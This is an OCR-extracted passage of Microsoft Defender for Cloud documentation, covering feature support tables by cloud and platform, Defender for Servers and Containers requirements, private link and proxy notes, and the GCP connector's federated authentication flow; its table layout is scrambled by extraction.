

e Defender for Servers support 
e Defender for Containers support 


O Note 


Even though Microsoft Defender for Servers is designed to protect servers, most of 
its features are supported for Windows 10 machines. One feature that isn't 
currently supported is Defender for Cloud's integrated EDR solution: Microsoft 


Defender for Endpoint. 


Next steps 


This article explained how Microsoft Defender for Cloud is supported in the Azure, Azure 
Government, and Azure China 21Vianet clouds. Now that you're familiar with the 
Defender for Cloud capabilities supported in your cloud, learn how to: 


e Manage security recommendations in Defender for Cloud 
e Manage and respond to security alerts in Defender for Cloud 


Defender for Cloud support for Azure 
commercial/other clouds 


Article e 10/20/2023 


This article indicates which Defender for Cloud features are supported in Azure 


commercial and government clouds. 


Cloud support 


In the support table, NA indicates that the feature isn't available. 


Feature/Plan 


GENERAL FEATURES 
Continuous data export 


Response automation with Azure Logic 
Apps 


Security alerts 
Generated when one or more Defender 
for Cloud plans is enabled. 


Alert email notifications 
Alert suppression rules 


Alert bi-directional synchronization with 
Microsoft Sentinel 


Azure Workbooks integration for 
reporting 


Automatic component/agent/extension 
provisioning 


FOUNDATIONAL CSPM FEATURES 
(FREE) 


Asset inventory 


Security recommendations based on 
the Microsoft Cloud Security 
Benchmark 


Azure 


GA 


GA 


GA 


GA 


GA 


Preview 


GA 


GA 


GA 


GA 


Azure 
Government 


GA 


GA 


GA 


GA 


GA 


NA 


GA 


GA 


GA 


GA 


Microsoft Azure operated 
by 21Vianet 


GA 


GA 


GA 


GA 


GA 


NA 


GA 


GA 


GA 


GA 


Feature/Plan 


Recommendation exemptions 
Secure score 

DevOps security posture 
DEFENDER FOR CLOUD PLANS 
Defender CSPM 


Defender for APIs. Review support 
preview regions. 


Defender for App Service 
Defender for Azure Cosmos DB 


Defender for Azure SQL database 
servers 


Defender for Containers 
Review detailed feature support 


Defender for DevOps 
Defender for DNS 
Defender for Key Vault 


Defender for Open-Source Relational 
Databases 


Defender for Resource Manager 


Defender for Servers 
Review detailed feature support. 


Defender for Storage 


Defender for SQL Servers on Machines 


© Important 


Azure 


Preview 


GA 


Preview 


GA 


Preview 


GA 


GA 


GA 


GA 


Preview 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Azure 
Government 


NA 
GA 


NA 


NA 


NA 


NA 
NA 


GA 


GA 


NA 
GA 
NA 


NA 


GA 
GA 
GA (activity 
monitoring) 


GA 


Microsoft Azure operated 
by 21Vianet 


NA 
GA 


NA 


NA 


NA 


NA 
NA 


GA 


A subset of 
alerts/vulnerability 
assessments is available. 
Behavioral threat 
protection isn't available. 


GA 


NA 
GA 
NA 


NA 


GA 


GA 


NA 


NA 


As of August 1, customers with an existing subscription to Defender for DNS can 
continue to use the service, but new subscribers will receive alerts about suspicious 
DNS activity as part of Defender for Servers P2. 


Next steps 


Start reading about Defender for Cloud features. 


Defender for Servers support 


Article e 06/11/2023 


This article summarizes support information for the Defender for Servers plan in 
Microsoft Defender for Cloud. 


Network requirements 


Validate the following endpoints are configured for outbound access so that Azure Arc 
extension can connect to Microsoft Defender for Cloud to send security data and events: 


e For Defender for Server multicloud deployments, make sure that the addresses and 
ports required by Azure Arc are open. 


e For deployments with GCP connectors, open port 443 to these URLs: 
O osconfig.googleapis.com 
© compute.googleapis.com 
© containeranalysis.googleapis.com 
O agentonboarding.defenderforservers.security.azure.com 


Oo gbl.his.arc.azure.com 


e For deployments with AWS connectors, open port 443 to these URLs: 
B ssm.<region>.amazonaws.com 
(0) ssmmessages.<region>.amazonaws.com 
O ec2messages.<region>.amazonaws.com 


o gbl.his.arc.azure.com 


Azure cloud support 


This table summarizes Azure cloud support for Defender for Servers features. 


Feature/Plan Azure Azure Azure 
Government China 
21Vianet 
Microsoft Defender for Endpoint integration GA GA NA 
Compliance standards GA GA GA 


Compliance standards might differ depending on the cloud 
type. 


Feature/Plan 


Microsoft Cloud Security Benchmark recommendations for 
OS hardening 


VM vulnerability scanning-agentless 


VM vulnerability scanning - Microsoft Defender for 
Endpoint sensor 


VM vulnerability scanning - Qualys 
Just-in-time VM access 

File integrity monitoring 

Adaptive application controls 
Adaptive network hardening 


Docker host hardening 


Windows machine support 


Azure Azure 


Government 
GA GA 
GA NA 
GA NA 
GA NA 
GA GA 
GA GA 
GA GA 
GA NA 
GA GA 


Azure 
China 
21Vianet 


GA 


NA 


NA 


NA 


GA 


GA 


GA 


NA 


GA 


The following table shows feature support for Windows machines in Azure, Azure Arc, 


and other clouds. 


Feature *Azure VMs 
VM Scale Sets 
(Flexible 
orchestration 
Microsoft Defender for Endpoint v 
integration (on supported 
versions) 
Virtual machine behavioral v 
analytics (and security alerts) 
Fileless security alerts v 
Network-based security alerts v 
Just-in-time VM access vV 
Integrated Qualys vulnerability v 


scanner 


Azure Arc- 
enabled 
machines 


Defender for 
Servers required 


Yes 


Yes 


Yes 


Yes 


Yes 


Yes 


Feature *Azure VMs Azure Arc- Defender for 
VM Scale Sets enabled Servers required 
(Flexible machines 
orchestration 


File Integrity Monitoring vV vV Yes 
Adaptive application controls vV vV Yes 
Network map vV - Yes 
Adaptive network hardening vV g Yes 
Regulatory compliance v vV Yes 


dashboard & reports 


Docker host hardening - - Yes 
Missing OS patches assessment vV vV Azure: No 
Azure Arc- 
enabled: Yes 
Security misconfigurations vV vV Azure: No 
assessment 
Azure Arc- 
enabled: Yes 
Endpoint protection assessment vV vV Azure: No 
Azure Arc- 
enabled: Yes 
Disk encryption assessment vV - No 
(for supported 
scenarios) 
Third-party vulnerability vV - No 


assessment (BYOL) 


Network security assessment vV - No 


Linux machine support 


The following table shows feature support for Linux machines in Azure, Azure Arc, and 
other clouds. 


Feature 


Microsoft Defender for Endpoint 
integration 


Virtual machine behavioral 
analytics (and security alerts) 


Fileless security alerts 
Network-based security alerts 
Just-in-time VM access 


Integrated Qualys vulnerability 
scanner 


File Integrity Monitoring 
Adaptive application controls 
Network map 

Adaptive network hardening 


Regulatory compliance 
dashboard & reports 


Docker host hardening 


Missing OS patches assessment 


Security misconfigurations 
assessment 


Endpoint protection assessment 


Disk encryption assessment 


Third-party vulnerability 
assessment (BYOL) 


Azure VMs 
VM Scale Sets 
(Flexible 
orchestration 


v 


v 
(on supported 
versions) 


v 
(for supported 
scenarios) 


v 


Azure Arc- 
enabled 
machines 


Defender for 
Servers required 


Yes 


Yes 


Yes 
Yes 
Yes 


Yes 


Yes 
Yes 
Yes 
Yes 


Yes 


Yes 


Azure: No 


Azure Arc- 
enabled: Yes 


Azure: No 


Azure Arc- 
enabled: Yes 


No 


No 


No 


Feature Azure VMs 
VM Scale Sets 
(Flexible 
orchestration 


Network security assessment vV 


Multicloud machines 


Azure Arc- 
enabled 
machines 


Defender for 
Servers required 


No 


The following table shows feature support for AWS and GCP machines. 


Feature Availability in AWS 


Microsoft Defender for Endpoint integration 


Virtual machine behavioral analytics (and 
security alerts) 


Fileless security alerts 

Network-based security alerts 
Just-in-time VM access 

Integrated Qualys vulnerability scanner 
File Integrity Monitoring 

Adaptive application controls 

Network map 

Adaptive network hardening 
Regulatory compliance dashboard & reports 
Docker host hardening 

Missing OS patches assessment 
Security misconfigurations assessment 
Endpoint protection assessment 


Disk encryption assessment 


Third-party vulnerability assessment 


v 


v 


v 


vV 
(for supported 
scenarios) 


Availability in GCP 
v 


v 


v 


vV 
(for supported 
scenarios) 


Feature Availability in AWS Availability in GCP 
Network security assessment - - 


Cloud security explorer v - 


Endpoint protection support 


The following table provides a matrix of supported endpoint protection solutions. The 
table indicates whether you can use Defender for Cloud to install each solution for you. 


Solution Supported platforms Defender for Cloud 
installation 

Microsoft Defender Antivirus Windows Server 2016 or later No (built into OS) 

System Center Endpoint Protection Windows Server 2012 R2 Via extension 


(Microsoft Antimalware) 


Trend Micro — Deep Security Windows Server (all) No 
Symantec v12.1.1100+ Windows Server (all) No 

McAfee v10+ Windows Server (all) No 

McAfee v10+ Linux (GA) No 

Microsoft Defender for Endpoint for Linux (GA) Via extension 
Linux’ 


Microsoft Defender for Endpoint Unified Windows Server 2012 R2and Via extension 
Solution? Windows 2016 


Sophos V9+ Linux (GA) No 


1 It's not enough to have Microsoft Defender for Endpoint on the Linux machine: the 
machine will only appear as healthy if the always-on scanning feature (also known as 
real-time protection (RTP)) is active. By default, the RTP feature is disabled to avoid 
clashes with other AV software. 


2 With the MDE unified solution on Server 2012 R2, it automatically installs Microsoft 
Defender Antivirus in Active mode. For Windows Server 2016, Microsoft Defender 
Antivirus is built into the OS. 


Next steps 


Start planning your Defender for Servers deployment. 


Defender for Containers support 


Article • 09/06/2023 
This article summarizes support information for the Defender for Containers plan in Microsoft 
Defender for Cloud. 

© Note 


Specific features are in preview. The Azure Preview Supplemental Terms Z include other 
legal terms that apply to Azure features that are in beta, preview, or otherwise not yet 
released into general availability. 


Azure (AKS) 


Feature Supported Linux Windows Agentless/Agent- Pricing Azure clouds 
Resources release release based Tier availability 
state state 


Agentless discovery for ACR, AKS GA GA Agentless Defender Azure commercial 
Kubernetes for clouds 
Containers 
or 
Defender 
CSPM 
Compliance-Docker CIS VM, Virtual GA - Log Analytics Defender Commercial 
Machine agent for Servers clouds 
Scale Set Plan 2 
National clouds: 
Azure 
Government, 


Microsoft Azure 
operated by 


21Vianet 
Vulnerability ACR, GA Preview Agentless Defender Commercial 
assessment (powered Private for clouds 
by Qualys) - registry ACR Containers 
scan OS packages National clouds: 
Azure 
Government, 
Azure operated by 
21Vianet 
Vulnerability ACR, Preview - Agentless Defender Commercial 
assessment (powered Private for clouds 
by Qualys) -registry ACR Containers 
scan language National clouds: 


packages Azure 


Feature Supported Linux Windows 

Resources release release 
state state 

Vulnerability AKS GA Preview 

assessment (powered 

by Qualys) - running 

images 

Vulnerability ACR, Preview 

assessment powered Private 

by MDVM - registry ACR 

scan 

Vulnerability AKS Preview 

assessment powered 

by MDVM - running 

images 

Hardening (control ACR, AKS GA Preview 

plane) 

Hardening (Kubernetes AKS GA - 

data plane) 

Runtime threat AKS GA GA 

detection (control 

plane) 

Runtime threat AKS GA - 

detection (workload) 

Discovery/provisioning- AKS GA GA 


Unprotected clusters 


Agentless/Agent- 
based 


Defender agent 


Agentless 


Defender agent 


Agentless 


Azure Policy 


Agentless 


Defender agent 


Agentless 


Pricing 
Tier 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


Free 


Free 


Defender 
for 
Containers 


Defender 
for 
Containers 


Free 


overn 
zure c DA 


ABR eS PY 
21Vianet 


Commercial 
clouds 


Commercial 
clouds 


Commercial 
clouds 


Commercial 
clouds 


National clouds: 
Azure 
Government, 
Azure operated by 
21Vianet 


Commercial 
clouds 


National clouds: 
Azure 
Government,Azure 
operated by 
21Vianet 


Commercial 
clouds 


National clouds: 
Azure 
Government, 
Azure operated by 
21Vianet 


Commercial 


clouds 


Commercial 
clouds 


National clouds: 
Azure 


Feature Supported Linux Windows Agentless/Agent- Pricing Azure clouds 
Resources release release based Tier availability 
state state 


Government, 
Azure operated by 
21Vianet 
Discovery/provisioning- AKS GA GA Agentless Defender Commercial 
Collecting control for clouds 
plane threat data Containers 
National clouds: 
Azure 
Government, 
Azure operated by 
21Vianet 
Discovery/provisioning- AKS GA = Agentless Defender Commercial 
Defender agent auto for clouds 
provisioning Containers 
National clouds: 
Azure 
Government, 
Azure operated by 
21Vianet 
Discovery/provisioning- AKS GA d Agentless Free Commercial 
Azure Policy for clouds 
Kubernetes auto 
provisioning National clouds: 
Azure 
Government, 


Azure operated by 
21Vianet 


Registries and images support for Azure - powered by Qualys 


Aspect Details 
Registries and Supported 
images e ACR registries protected with Azure Private Link (Private registries requires access to 


Trusted Services) 

e Windows images using Windows OS version 1709 and above (Preview). This is free 
while it's in preview, and will incur charges (based on the Defender for Containers 
plan) when it becomes generally available. 


Unsupported 

e Super-minimalist images such as Docker scratch £ images 

e "Distroless" images that only contain an application and its runtime dependencies 
without a package manager, shell, or OS 

e Images with Open Container Initiative (OCI) Image Format Specification 7 

e Providing image tag information for multi-architecture images E is currently 
unsupported 


Aspect 


OS Packages 


Language specific 
packages (Preview) 


(Only supported for 
Linux images) 


Details 


Supported 

e Alpine Linux 3.12-3.16 

e Red Hat Enterprise Linux 6, 7, 8 
e CentOS 6, 7 

e Oracle Linux 6, 7, 8 

e Amazon Linux 1, 2 

e openSUSE Leap 42, 15 

e SUSE Enterprise Linux 11, 12, 15 
e Debian GNU/Linux wheezy, jessie, stretch, buster, bullseye 
e Ubuntu 10.10-22.04 

e FreeBSD 11.1-13.1 

e Fedora 32, 33, 34, 35 


Supported 
e Python 

e Nodejs 

e NET 

e JAVA 

e Go 


Registries and images for Azure - powered by MDVM 


Aspect 


Registries and 
images 


OS Packages 


Details 


Supported 

e ACR registries 

e ACR registries protected with Azure Private Link (Private registries requires access 
to Trusted Services) 

e Container images in Docker V2 format 

Unsupported 

e Super-minimalist images such as Docker scratch 7 images 

e "Distroless" images that only contain an application and its runtime dependencies 
without a package manager, shell, or OS 

is currently unsupported 

e Images with Open Container Initiative (OCI) Z image format specification 

e Windows images 


Supported 

e Alpine Linux 3.12-3.16 

e Red Hat Enterprise Linux 6-9 
e CentOS 6-9 

e Oracle Linux 6-9 

e Amazon Linux 1, 2 

e openSUSE Leap, openSUSE Tumbleweed 
e SUSE Enterprise Linux 11-15 
e Debian GNU/Linux 7-12 

e Ubuntu 12.04-22.04 

e Fedora 31-37 

e Mariner 1-2 


Aspect Details 


Language specific Supported 
packages e Python 

e Node.js 

e NET 

e JAVA 

e Go 


Kubernetes distributions and configurations - Azure 


Aspect Details 


Kubernetes distributions and configurations Supported 
e Azure Kubernetes Service (AKS) with Kubernetes RBAC 


Supported via Arc enabled Kubernetes 1 ? 
e Azure Kubernetes Service hybrid 

e Kubernetes Z 

e AKS Engine & 

e Azure Red Hat OpenShift 7 


i Any Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters should be 
supported, but only the specified clusters have been tested on Azure. 


* To get Microsoft Defender for Containers protection for your environments, you need to 
onboard Azure Arc-enabled Kubernetes and enable Defender for Containers as an Arc extension. 


© Note 


For additional requirements for Kubernetes workload protection, see existing limitations. 


Private link restrictions 


Defender for Containers relies on the Defender agent for several features. The Defender agent 
doesn't support the ability to ingest data through Private Link. You can disable public access for 
ingestion, so that only machines that are configured to send traffic through Azure Monitor 
Private Link can send data to that workstation. You can configure a private link by navigating to 
your workspace > Network Isolation and setting the Virtual networks access configurations to 
No. 


DO Virtual networks access configuration 


Accept queries from public networks not connected through a Private Link Scope © 


| Yes 


No ) 


Allowing data ingestion to occur only through Private Link Scope on your workspace Network 


Isolation settings, can result in communication failures and partial converge of the Defender for 


Containers feature set. 


Learn how to use Azure Private Link to connect networks to Azure Monitor. 


AWS (EKS) 


Domain 


Compliance 


Vulnerability 
Assessment 


Vulnerability 
Assessment 


Hardening 


Hardening 


Runtime 
protection 


Runtime 
protection 


Discovery 
and 
provisioning 


Feature 


Docker CIS 


Registry scan 


View vulnerabilities 
for running images 


Control plane 
recommendations 


Kubernetes data 
plane 
recommendations 


Threat detection 
(control plane) 


Threat detection 
(workload) 


Discovery of 
unprotected 
clusters 


Supported 


Resources 


EC2 


ECR 


EKS 


EKS 


EKS 


EKS 


Linux 
release 
state 


Preview 


Preview 


Preview 


Preview 


Preview 


Preview 


Windows 
release 
state 


Preview 


Agentless/Agent- 
based 


Log Analytics 
agent 


Agentless 


Azure Policy for 


Kubernetes 


Agentless 


Defender agent 


Agentless 


Pricing 
tier 


Defender 
for Servers 
Plan 2 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


Free 


Domain Feature Supported Linux Windows Agentless/Agent- Pricing 


Resources release release based tier 
state state 

Discovery Collection of EKS Preview Preview Agentless Defender 
and control plane for 
provisioning threat data Containers 
Discovery Auto provisioning - - - = = 
and of Defender agent 
provisioning 
Discovery Auto provisioning - - - = = 
and of Azure Policy for 


provisioning Kubernetes 


Images support - AWS 


Aspect Details 
Registries and Unsupported 
images e Images that have at least one layer over 2 GB 


e Public repositories and manifest lists 
e Images in the AWS management account aren't scanned so that we don't create 
resources in the management account. 


Kubernetes distributions/configurations support - AWS 


Aspect Details 


Kubernetes distributions and configurations Supported 
e Amazon Elastic Kubernetes Service (EKS) £ 


Supported via Arc enabled Kubernetes ! ? 
e Kubernetes £ 


1 Any Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters should be 
supported, but only the specified clusters have been tested. 


* To get Microsoft Defender for Containers protection for your environments, you need to 
onboard Azure Arc-enabled Kubernetes and enable Defender for Containers as an Arc extension. 


© Note 


For additional requirements for Kubernetes workload protection, see existing limitations. 


Private link restrictions 


Defender for Containers relies on the Defender agent for several features. The Defender agent 
doesn't support the ability to ingest data through Private Link. You can disable public access for 
ingestion, so that only machines that are configured to send traffic through Azure Monitor 
Private Link can send data to that workstation. You can configure a private link by navigating to 
your workspace > Network Isolation and setting the Virtual networks access configurations to 
No. 


(â) Virtual networks access configuration 


Accept dat m public networks not connected through a Private Link Scope © 


Yes 


Accept queries from public networks not connected through a Private Link Scope © 


| Yes No 


Allowing data ingestion to occur only through Private Link Scope on your workspace Network 
Isolation settings, can result in communication failures and partial converge of the Defender for 
Containers feature set. 


Learn how to use Azure Private Link to connect networks to Azure Monitor. 


Outbound proxy support 


Outbound proxy without authentication and outbound proxy with basic authentication are 
supported. Outbound proxy that expects trusted certificates is currently not supported. 


GCP (GKE) 


Domain Feature Supported Linux Windows Agentless/Agent- Pricing 
Resources release release based tier 
state state 
Compliance Docker CIS GCP VMs Preview - Log Analytics Defender 
agent for Servers 
Plan 2 


Vulnerability Registry scan e - : - - 
Assessment 


Vulnerability View vulnerabilities — - - - = e 
Assessment for running images 


Hardening Control plane GKE GA GA Agentless Free 
recommendations 


Domain 


Hardening 


Runtime 
protection 


Runtime 
protection 


Discovery 
and 
provisioning 


Discovery 
and 
provisioning 


Discovery 
and 
provisioning 


Discovery 
and 
provisioning 


Feature 


Kubernetes data 
plane 
recommendations 


Threat detection 
(control plane) 


Threat detection 
(workload) 


Discovery of 
unprotected 
clusters 


Collection of 
control plane 
threat data 


Auto provisioning 
of Defender agent 


Auto provisioning 
of Azure Policy for 
Kubernetes 


Supported 


Resources 


GKE 


GKE 


GKE 


GKE 


GKE 


GKE 


GKE 


Linux 
release 
state 


Preview 


Preview 


Preview 


Preview 


Preview 


Preview 


Preview 


Windows 
release 
state 


Preview 


Preview 


Agentless/Agent- 
based 


Azure Policy for 


Kubernetes 


Agentless 


Defender agent 


Agentless 


Agentless 


Agentless 


Agentless 


Kubernetes distributions/configurations support - GCP 


Aspect 


Kubernetes distributions and configurations 


Details 


Supported 


Pricing 
tier 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


Free 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


e Google Kubernetes Engine (GKE) Standard Z 


Supported via Arc enabled Kubernetes ! 2 


e Kubernetes Z 


Unsupported 
e Private network clusters 
e GKE autopilot 
e GKE AuthorizedNetworksConfig 


1 Any Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters should be 


supported, but only the specified clusters have been tested. 


* To get Microsoft Defender for Containers protection for your environments, you need to 


onboard Azure Arc-enabled Kubernetes and enable Defender for Containers as an Arc extension. 


© Note 


For additional requirements for Kubernetes workload protection, see existing limitations. 


Private link restrictions 


Defender for Containers relies on the Defender agent for several features. The Defender agent 
doesn't support the ability to ingest data through Private Link. You can disable public access for 
ingestion, so that only machines that are configured to send traffic through Azure Monitor 
Private Link can send data to that workstation. You can configure a private link by navigating to 
your workspace > Network Isolation and setting the Virtual networks access configurations to 
No. 


(â) Virtual networks access configuration 


Accept dat m public networks not connected through a Private Link Scope © 


Yes 


Accept queries from public networks not connected through a Private Link Scope © 


| Yes No 


Allowing data ingestion to occur only through Private Link Scope on your workspace Network 
Isolation settings, can result in communication failures and partial converge of the Defender for 
Containers feature set. 


Learn how to use Azure Private Link to connect networks to Azure Monitor. 


Outbound proxy support 


Outbound proxy without authentication and outbound proxy with basic authentication are 
supported. Outbound proxy that expects trusted certificates is currently not supported. 


On-premises, Arc-enabled Kubernetes clusters 


Domain Feature Supported Linux Windows Agentless/Agent- Pricing 
Resources release release based tier 
state state 
Compliance Docker CIS Arc Preview - Log Analytics Defender 
enabled agent for Servers 


VMs Plan 2 


Domain 


Vulnerability 
Assessment 


Vulnerability 
Assessment 


Vulnerability 
Assessment 


Hardening 


Hardening 


Runtime 
protection 


Runtime 
protection 
for 
supported 
OS 


Discovery 
and 
provisioning 


Discovery 
and 
provisioning 


Discovery 
and 
provisioning 


Discovery 
and 
provisioning 


Feature 


Registry scan - OS 
packages 


Registry scan - 
language specific 
packages 


View 
vulnerabilities for 
running images 


Control plane 
recommendations 


Kubernetes data 
plane 
recommendations 


Threat detection 
(control plane) 


Threat detection 
(workload) 


Discovery of 
unprotected 
clusters 


Collection of 
control plane 
threat data 


Auto provisioning 
of Defender agent 


Auto provisioning 
of Azure Policy for 
Kubernetes 


Supported 
Resources 


ACR, 
Private ACR 


ACR, 
Private ACR 
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Preview 


Preview 


Preview 


Preview 


Preview 
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Registries and images support - on-premises 


Pricing 
tier 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


Free 


Defender 
for 
Containers 


Defender 
for 
Containers 


Defender 
for 
Containers 


Aspect Details 


Registries and Supported 

images e ACR registries protected with Azure Private Link (Private registries requires access to 
Trusted Services) 
e Windows images using Windows OS version 1709 and above (Preview). This is free 
while it's in preview, and will incur charges (based on the Defender for Containers 
plan) when it becomes generally available. 


Unsupported 

e Super-minimalist images such as Docker scratch “ images 

e "Distroless" images that only contain an application and its runtime dependencies 
without a package manager, shell, or OS 

e Images with Open Container Initiative (OCI) Image Format Specification 7 

e Providing image tag information for multi-architecture images E is currently 
unsupported 


OS Packages Supported 
e Alpine Linux 3.12-3.15 
e Red Hat Enterprise Linux 6, 7, 8 
e CentOS 6, 7 
e Oracle Linux 6, 7, 8 
e Amazon Linux 1, 2 
e openSUSE Leap 42, 15 
e SUSE Enterprise Linux 11, 12, 15 
e Debian GNU/Linux wheezy, jessie, stretch, buster, bullseye 
e Ubuntu 10.10-22.04 
e FreeBSD 11.1-13.1 
e Fedora 32, 33, 34, 35 


Language specific Supported 
packages (Preview) e Python 

e Node.js 
(Only supported for e NEI 
Linux images) e JAVA 

e Go 


Kubernetes distributions and configurations 


Aspect Details 


Kubernetes distributions and configurations Supported via Arc enabled Kubernetes | 2 
e Azure Kubernetes Service hybrid 
e Kubernetes 7 
e AKS Engine E 
e Azure Red Hat OpenShift Z 
e Red Hat OpenShift “ (version 4.6 or newer) 
e VMware Tanzu Kubernetes Grid 
e Rancher Kubernetes Engine E 


1 Any Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters should be 
supported, but only the specified clusters have been tested. 


2 To get Microsoft Defender for Containers protection for your environments, you need to 
onboard Azure Arc-enabled Kubernetes and enable Defender for Containers as an Arc extension. 


© Note 


For additional requirements for Kubernetes workload protection, see existing limitations. 


Supported host operating systems 


Defender for Containers relies on the Defender agent for several features. The Defender agent is 
supported on the following host operating systems: 


e Amazon Linux 2 

e CentOS 8 

e Debian 10 

e Debian 11 

e Google Container-Optimized OS 
e Mariner 1.0 

e Mariner 2.0 

e Red Hat Enterprise Linux 8 
e Ubuntu 16.04 

e Ubuntu 18.04 

e Ubuntu 20.04 

e Ubuntu 22.04 


Ensure your Kubernetes node is running on one of the verified supported operating systems. 
Clusters with different host operating systems, only get partial coverage. 


Network restrictions 


Private link 


Defender for Containers relies on the Defender agent for several features. The Defender agent 
doesn't support the ability to ingest data through Private Link. You can disable public access for 
ingestion, so that only machines that are configured to send traffic through Azure Monitor 
Private Link can send data to that workstation. You can configure a private link by navigating to 
your workspace > Network Isolation and setting the Virtual networks access configurations to 
No. 


Q Virtual networks access configuration 


Accept queries from public networks not connected through a Private Link Scope © 


( es No | ) 


Allowing data ingestion to occur only through Private Link Scope on your workspace Network 
Isolation settings, can result in communication failures and partial converge of the Defender for 
Containers feature set. 


Learn how to use Azure Private Link to connect networks to Azure Monitor. 


Outbound proxy support 


Outbound proxy without authentication and outbound proxy with basic authentication are 
supported. Outbound proxy that expects trusted certificates is currently not supported. 


Next steps 


e Learn how Defender for Cloud collects data using the Log Analytics Agent. 
e Learn how Defender for Cloud manages and safeguards data. 
e Review the platforms that support Defender for Cloud. 


Support and prerequisites for agentless 
containers posture 


Article e 08/03/2023 


All of the agentless container capabilities are available as part of the Defender Cloud 
Security Posture Management plan. 


Review the requirements on this page before setting up agentless containers posture in 
Microsoft Defender for Cloud. 


Availability 


Aspect Details 

Release General Availability (GA) 

state: 

Pricing: Requires Defender Cloud Security Posture Management (CSPM) and is billed as 


shown on the pricing page 7 


Clouds: © Azure Commercial clouds 
* Azure Government 

* Microsoft Azure operated by 21Vianet 

*“ Connected AWS accounts 


*' Connected GCP accounts 


Permissions You need to have access as a: 
- Subscription Owner, or 


- User Access Admin and Security Admin permissions for the Azure subscription 
used for onboarding 


Registries and images - powered by MDVM 


Aspect Details 
Registries and Supported 
images e ACR registries 


e ACR registries protected with Azure Private Link (Private registries requires 
access to Trusted Services) 

e Container images in Docker V2 format 

Unsupported 

e Super-minimalist images such as Docker scratch “ images 


Aspect Details 


e "Distroless" images that only contain an application and its runtime 
dependencies without a package manager, shell, or OS 

is currently unsupported 

e Images with Open Container Initiative (OCI) Z image format specification 
e Windows images 


OS Packages Supported 
e Alpine Linux 3.12-3.16 
e Red Hat Enterprise Linux 6-9 
e CentOS 6-9 
e Oracle Linux 6-9 
e Amazon Linux 1, 2 
e openSUSE Leap, openSUSE Tumbleweed 
e SUSE Enterprise Linux 11-15 
e Debian GNU/Linux 7-12 
e Ubuntu 12.04-22.04 
e Fedora 31-37 
e Mariner 1-2 


Language specific Supported 
packages e Python 

e Nodeēe;js 

e NET 


e JAVA 
e Go 


Prerequisites 


You need to have a Defender CSPM plan enabled. There's no dependency on Defender 
for Containers. 


This feature uses trusted access. Learn more about AKS trusted access prerequisites. 


Are you using an updated version of AKS? 

Learn more about supported Kubernetes versions in Azure Kubernetes Service (AKS). 
Are attack paths triggered on workloads that are running 
on Azure Container Instances? 


Attack paths are currently not triggered for workloads running on Azure Container 
Instances. 


Next steps 


Learn how to enable agentless containers. 


Defender for Cloud for your multicloud 
environment 


Microsoft Defender for Cloud connects to your multicloud environments with agentless, 
API-based methods for CSPM insight. You can leverage Azure Arc to use Defender plans 
for CWP. 


About multicloud deployments 


OVERVIEW 
Overview of hybrid and multicloud 
Why protect multicloud resources with Microsoft Defender for Cloud £ 


Get started planning multicloud security 


HOW-TO GUIDE 
Connect your non-Azure machines to Defender for Cloud 


Enable enhanced security for your multicloud resources 


[6] REFERENCE 


Troubleshooting multicloud connectors 


Defend Amazon AWS resources 


OVERVIEW 

Protect your AWS virtual machines with Defender for Servers 
Supported features for AWS virtual machines 

Protect your AWS EKS containers with Defender for Containers 


Supported features for AWS EKS containers 


E GET STARTED 


Connect your AWS accounts to Microsoft Defender for Cloud 


Enable Defender for Containers for your AWS EKS containers 


Enable Defender for SQL servers for your AWS SQL databases 


HOW-TO GUIDE 

Secure your AWS management ports with just-in-time access 

Protect your AWS virtual machines with Microsoft Defender for Endpoint 
Harden your AWS Docker hosts 

Monitor file changes that might indicate an attack 


Scan your AWS virtual machines for vulnerabilities 


DO VIDEO 


How to connect AWS to Microsoft Defender for Cloud Z 


[6] REFERENCE 


Security recommendations for AWS resources 


Defend Google GCP resources 


OVERVIEW 

Protect your GCP virtual machines with Defender for Servers 
Supported features for GCP virtual machines 

Protect your GCP GKE containers with Defender for Containers 


Supported features for GCP GKE containers 


E GET STARTED 
Connect your GCP accounts to Microsoft Defender for Cloud 
Enable Defender for Containers for your GCP GKE containers 


Enable Defender for SQL servers for your GCP SQL databases 


IE] VIDEO 


How to connect GCP to Microsoft Defender for Cloud £ 


Defender for Cloud's GCP connector 


Article e 06/29/2023 


The Microsoft Defender for Cloud GCP (Google Cloud Platform) connector is a feature 
that allows an organization to extend its cloud security posture management to their 
Google Cloud environments. 


The GCP connector allows organizations to use Microsoft Defender for Cloud to monitor 
and assess the security state of their Google Cloud resources. The connector allows 
organizations to use Microsoft Defender for Cloud to apply security policies and receive 
security recommendations for their Google Cloud resources. 


The GCP connector allows for continuous monitoring of Google Cloud resources for 
security risks, vulnerabilities, and misconfigurations. It also provides automated 
remediation capabilities to address identified risks and compliance issues. Additionally, 
it allows organizations to use the Microsoft Defender for Cloud's integrated threat 
protection capabilities to protect their Google Cloud resources from threats. 


GCP authorization design 


The authentication process between Microsoft Defender for Cloud and GCP is a 
federated authentication process. 


When you onboard to Defender for Cloud, the GCloud template is used to create the 
following resources as part of the authentication process: 


e Workload identity pool and providers 
e Service accounts and policy bindings 


The authentication process works as follows: 


Customer Tenant id Azure A 9 Google Cloud Platform 
: Onboard GCP 
: project to Workload 
EE MDC Identity Pool 
' Customer 


Azure Portal 


3 


' Customer applies gcloud script to 


create all required resources Security Token Service Account 


Service 


Azure AD application ' 
(CSPM first party) ‘ 


(1) - Microsoft Defender for Cloud's CSPM service acquires a Microsoft Entra token. The 
token is signed by Microsoft Entra ID using the RS256 algorithm and is valid for 1 hour. 


(2) - The Microsoft Entra token is exchanged with Google's STS token. 


(3) - Google STS validates the token with the workload identity provider. The Microsoft 
Entra token is sent to Google's STS that validates the token with the workload identity 
provider. Audience validation then occurs and the token is signed. A Google STS token 
is then returned to Defender for Cloud's CSPM service. 


(4) - Defender for Cloud's CSPM service uses the Google STS token to impersonate the 
service account. Defender for Cloud's CSPM receives service account credentials that are 
used to scan the project. 


What happens when you onboard a single 
project 

There are four parts to the onboarding process that take place when you create the 
security connection between your GCP project and Microsoft Defender for Cloud. 
